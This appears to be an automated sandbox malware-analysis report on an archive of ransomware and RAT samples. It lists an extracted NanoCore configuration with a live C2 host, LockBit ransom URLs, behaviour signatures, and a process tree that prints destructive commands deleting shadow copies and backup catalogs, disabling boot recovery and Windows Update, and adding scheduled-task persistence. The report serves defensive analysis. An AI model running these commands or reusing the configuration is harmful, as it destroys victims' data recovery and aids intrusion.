Analysis
-
max time kernel
63s -
max time network
109s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
31-10-2024 21:02
General
-
Target
RNSM00397.7z
-
Size
39.3MB
-
MD5
e52638e43ebfa52bd5648beeffd931d7
-
SHA1
96d71bb68432407f54c1bbc80cd8703a0e8ac6dd
-
SHA256
bb7bb4a8730311f0be23bfa9e365f8fbbe187b598ab86f4205f7f36c0a909a06
-
SHA512
8434c7ba9ff3725d42f8ab485ea3ef9b38146f74e9f474fe8b5bb903a0473cf63c6569fe8f7f82018770a004d2899ca09d0cd0df65842b731bb0b923eb6c5d2b
-
SSDEEP
786432:U5gYxvdKaQvCwQ4F390uklGLD74D66AtE6Y5OloJToBEO3z24DYc:CgYtILY4n0uGC7i6noOloyB3DYc
Malware Config
Extracted
nanocore
1.2.2.0
petroleum.sytes.net:1430
c7093f5f-20e4-4efa-a2b8-e96b9af4ad8c
-
activate_away_mode
true
- backup_connection_host
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2020-07-31T18:09:06.595074836Z
-
bypass_user_account_control
false
-
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
-
clear_access_control
true
-
clear_zone_identifier
true
-
connect_delay
4000
-
connection_port
1430
-
default_group
Revolution
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
c7093f5f-20e4-4efa-a2b8-e96b9af4ad8c
-
mutex_timeout
5000
-
prevent_system_sleep
true
-
primary_connection_host
petroleum.sytes.net
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Extracted
C:\Program Files\Crashpad\Restore-My-Files.txt
lockbit
http://lockbit-decryptor.top/?DFB941278EE2558C9775755EED0A433D
http://lockbitks2tvnmwk.onion/?DFB941278EE2558C9775755EED0A433D
Signatures
-
Disables service(s) 3 TTPs
-
Lockbit
Ransomware family with multiple variants released since late 2019.
-
Lockbit family
-
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
-
Nanocore family
-
Clears Windows event logs 1 TTPs 3 IoCs
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
-
Clears Network RDP Connection History and Configurations 1 TTPs 4 IoCs
Remove evidence of malicious network connections to clean up operations traces.
-
Deletes backup catalog 3 TTPs 2 IoCs
Uses wbadmin.exe to inhibit system recovery.
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 19 IoCs
-
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Modifies file permissions 1 TTPs 1 IoCs
-
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Access Token Manipulation: Create Process with Token 1 TTPs 13 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 64 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 17 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Interacts with shadow copies 3 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs .reg file with regedit 2 IoCs
-
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 17 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00397.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Desktop\00397\HEUR-Trojan-Ransom.MSIL.Blocker.gen-52df4354245d7b21810a04ab56ae1099387d777f42a6b9a151f439ecf77c4ce1.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-52df4354245d7b21810a04ab56ae1099387d777f42a6b9a151f439ecf77c4ce1.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "LAN Service" /xml "C:\Users\Admin\AppData\Local\Temp\tmp81CD.tmp"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
-
C:\Users\Admin\Desktop\00397\HEUR-Trojan-Ransom.MSIL.Crypmod.gen-0d5c9ea7ee730f8fa473c10372413046bbc7e4b21e48c06f509d9fb7159e971f.exeHEUR-Trojan-Ransom.MSIL.Crypmod.gen-0d5c9ea7ee730f8fa473c10372413046bbc7e4b21e48c06f509d9fb7159e971f.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Desktop\00397\HEUR-Trojan-Ransom.MSIL.Encoder.gen-fe5760a742540c74f4eefffaf61de0916393e2d60ce5d1b03e403d9c3e155343.exeHEUR-Trojan-Ransom.MSIL.Encoder.gen-fe5760a742540c74f4eefffaf61de0916393e2d60ce5d1b03e403d9c3e155343.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\Desktop\00397\HEUR-Trojan-Ransom.Win32.Agent.gen-d325a54642f60e944e5789cae90183ccee9ea80e6b292bd5dc20f429644eedd8.exeHEUR-Trojan-Ransom.Win32.Agent.gen-d325a54642f60e944e5789cae90183ccee9ea80e6b292bd5dc20f429644eedd8.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 16124⤵
- Program crash
-
-
-
C:\Users\Admin\Desktop\00397\HEUR-Trojan-Ransom.Win32.Blocker.gen-47ad8bf28075eca489bdf11e8b65b70e0ddb17728c12fd110aa8779cb69f13a1.exeHEUR-Trojan-Ransom.Win32.Blocker.gen-47ad8bf28075eca489bdf11e8b65b70e0ddb17728c12fd110aa8779cb69f13a1.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Desktop\00397\HEUR-Trojan-Ransom.Win32.Blocker.vho-5bf2529e51a55d00d51c34cbc87d3f813e66e5d7e059b1c6de525abc37af4320.exeHEUR-Trojan-Ransom.Win32.Blocker.vho-5bf2529e51a55d00d51c34cbc87d3f813e66e5d7e059b1c6de525abc37af4320.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\Desktop\00397\tpvpyme.exe"C:\Users\Admin\Desktop\00397\tpvpyme.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122885⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00397\USB_Habilitar.bat" "5⤵
-
C:\Windows\SysWOW64\regedit.exeREGEDIT /S "C:\Users\Admin\Desktop\00397\USB_habilitar.reg6⤵
- Runs .reg file with regedit
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00397\windowsUpdate.bat" "5⤵
-
C:\Windows\SysWOW64\regedit.exeREGEDIT /S "C:\Users\Admin\Desktop\00397\windowsUpdate.reg6⤵
- Runs .reg file with regedit
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update /v AUOptions /t REG_DWORD /d 1 /f5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config wuauserv start= disabled5⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled6⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net stop wuauserv5⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv6⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv7⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f5⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f5⤵
-
C:\Windows\SysWOW64\cmd.execmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f7⤵
-
-
-
-
-
-
C:\Users\Admin\Desktop\00397\HEUR-Trojan-Ransom.Win32.Crypren.gen-c66519665d397eafb24e44f562e822fc7c98f02afe44f9ab179ee8048af7596d.exeHEUR-Trojan-Ransom.Win32.Crypren.gen-c66519665d397eafb24e44f562e822fc7c98f02afe44f9ab179ee8048af7596d.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 5644⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 6564⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 6644⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 6844⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 8724⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 9684⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 9804⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 9684⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 11684⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 9684⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 12244⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 12324⤵
- Program crash
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete5⤵
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet5⤵
- Deletes backup catalog
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 11284⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 8964⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 9084⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 8884⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 8644⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 9204⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 13804⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 13924⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 9204⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 12084⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 7164⤵
- Program crash
-
-
-
C:\Users\Admin\Desktop\00397\HEUR-Trojan-Ransom.Win32.Encoder.gen-06513fdae5353de95be18a039591d3e770223a9d0b3cb4c592b19ed6e69b32ed.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-06513fdae5353de95be18a039591d3e770223a9d0b3cb4c592b19ed6e69b32ed.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\GLUpdateFWTool.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\GLUpdateFWTool.exe"4⤵
-
-
-
C:\Users\Admin\Desktop\00397\HEUR-Trojan-Ransom.Win32.Gen.gen-441088e4c5ec14c414964083af0075b984b3e56f5208c140433ca7bc81242bcd.exeHEUR-Trojan-Ransom.Win32.Gen.gen-441088e4c5ec14c414964083af0075b984b3e56f5208c140433ca7bc81242bcd.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 5684⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 7044⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 7124⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 6924⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 7404⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 8484⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 8604⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 8684⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 8764⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 8524⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 7084⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 8604⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 8844⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 8924⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 13284⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 19444⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 19524⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 19484⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 16644⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 18684⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 27764⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 26284⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 23644⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 28724⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 18924⤵
- Program crash
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete5⤵
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet5⤵
- Deletes backup catalog
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 30244⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 7644⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 23884⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 23804⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 23404⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 23844⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 23404⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 18364⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 23804⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 16244⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 14724⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 18364⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 10964⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 22404⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 23364⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 20284⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 14604⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 22404⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 10964⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 16884⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 16884⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 22564⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 14884⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 16524⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 15604⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 15524⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 15484⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 15604⤵
-
-
